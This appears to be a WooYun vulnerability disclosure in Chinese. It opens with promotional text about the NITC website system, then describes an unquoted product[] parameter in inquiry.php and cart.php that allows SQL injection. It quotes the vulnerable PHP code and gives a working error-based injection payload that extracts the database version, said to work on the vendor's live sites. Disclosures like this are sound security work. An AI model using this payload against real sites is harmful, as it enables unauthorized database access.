WooYun.org

NITC是国内第一家提供永久免费“效益型网站系统”的互联网企业。2008年投入研发NITC网站系统，2009年8月推出第一个产品———“NITC免费效益型网站系统V1.0”，数年来，因为系统一直免费，耗资近500万元。NITC产品深得用户喜爱，特别是2011年7月推出的“（定海神真）免费效益型网站系统V3.2”，用户下载量巨增。NITC系统其核心优势在于“营销功能强，用户体验好”，后台管理完全按照SEM网络营销规则设定，前端页面（主题模板）全部经W3C国际网页标准认证。简单易用，界面精美，是中小企业网站营销的最佳选择，不需要专业的技术就能轻易上手，并且做出网络营销效果非常好的网站。
2013年12月NITC再度推出“企业智能营销系统V4.0”，是目前最高级版本。该产品是在V3.2的基础上细化了原来优势功能，并且增加了手机网站、在线购物、会员管理、产品评论、在线分享等功能。这标志着NITC产品进入了一个新阶段，完美的实现了“企业网站+SEO优化+购物商城+手机网站”四合一的功能。它就象变形金刚一样，应用不同需求时表现出不同的价值。
漏洞文件：
inquiry.php 和 cart.php （不同文件 但是存在一样的问题）
参数product[] 木有单引号保护
$select = $_POST['product'];
$i = 0;
for ( ; $i < count( $select ); ++$i )
{
if ( isset( $select[$i] ) )
{
$product = $db->getRow( "select product.product_id,product.model,product.small_image,product_desc.name,product.price,product.weight from ".$site->table( "product" )." as product left join ".$site->table( "product_desc" )." as product_desc on product.product_id=product_desc.product_id where product.product_id=".$select[$i]." and product_desc.language_id=".$language['language_id'] );
if ( $product )
{
$cart->add_item( SESS_ID, $select[$i], 1, $product['model'], $product['price'], $product['weight'], 1 );
}
}
}
post product 数组进来
for ( ; $i < count( $select ); ++$i )
[]中间没东西
取0
select[0]就是数组的value
导致注入
官方四个站点均存在该漏洞
exp：product[]=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,version(),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)#